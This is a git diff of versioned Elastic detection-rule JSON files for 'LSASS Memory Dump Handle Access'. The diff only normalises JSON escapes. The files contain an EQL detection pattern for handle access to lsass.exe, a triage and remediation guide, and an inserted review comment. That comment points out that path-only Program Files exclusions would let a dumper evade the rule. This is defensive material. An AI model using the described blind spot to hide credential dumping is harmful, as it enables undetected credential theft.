@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. 
After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - 
Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. 
If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where host.os.type == \"windows\" and event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. 
*/\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656",
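Review bot: The `query` carried as context in this hunk suppresses every 4656 event whose `winlog.event_data.ProcessName` matches `?:\\Program Files\\*.exe` or `?:\\Program Files (x86)\\*.exe`, and that is the only attribute the exclusion checks, so an LSASS dumper dropped into any writable vendor subdirectory under those roots is silenced by path alone even though the rule rates the behaviour as high severity and the guide says false positives should be rare. The 4656 record as matched here carries no signer or hash field, so the exclusion cannot be tightened with a signature check in-query; the practical options are to narrow the two wildcards to the specific security-product paths that are actually noisy, or to keep them and state the blind spot in the `note` under "False positive analysis" so analysts know these paths are unmonitored by this rule. This is a `_106` snapshot and the commit only normalizes JSON escapes, so any such change presumably belongs in the current rule version.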
@@ -72,7 +72,7 @@
 ],
 "risk_score": 73,
 "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json
index d7da21fbcb0..7a11aff5423 100644
--- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_107.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. 
After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - 
Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There should be very few or no false positives for this rule. 
If this activity is expected or noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If the process is related to antivirus or endpoint detection and response solutions, validate that it is installed on the correct path and signed with the company's valid digital signature.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Scope compromised credentials and disable the accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "any where event.action == \"File System\" and event.code == \"4656\" and\n\n winlog.event_data.ObjectName : (\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume?\\\\Windows\\\\System32\\\\lsass.exe\",\n \"\\\\Device\\\\HarddiskVolume??\\\\Windows\\\\System32\\\\lsass.exe\") and\n\n /* The right to perform an operation controlled by an extended access right. 
*/\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", 
@@ -67,7 +67,7 @@
 ],
 "risk_score": 73,
 "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s SACL has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json
index 360d5197c2a..2c7cff2594f 100644
--- a/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/208dbe77-01ed-4954-8d44-1e5751cb20de_108.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Handle Access", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Handle Access\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nAdversaries may attempt to access credential material stored in LSASS process memory. After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn\u2019t prompted each time resource access is requested. These credential materials can be harvested by an adversary using administrative user or SYSTEM privileges to conduct lateral movement using [alternate authentication material](https://attack.mitre.org/techniques/T1550/).\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path 
